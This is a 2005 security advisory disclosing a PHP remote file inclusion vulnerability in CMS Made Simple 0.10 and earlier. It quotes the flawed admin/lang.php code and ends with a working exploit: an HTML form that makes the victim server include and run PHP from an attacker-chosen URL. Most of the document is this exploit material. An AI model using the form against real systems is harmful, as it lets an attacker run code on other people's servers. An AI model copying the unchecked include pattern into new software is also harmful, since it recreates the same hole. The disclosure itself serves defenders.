CMS Made Simple <= 0.10 - PHP injection
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
CMS Made Simple is an easy to use content managment
system for simple stable content site. Uses PHP, MySQL
and Smarty templating system.
--------------------------------------------------------
Vulnerable code exist in ./admin/lang.php:
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}
#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------
Exploit:
example.html:
<form
action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)"
method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --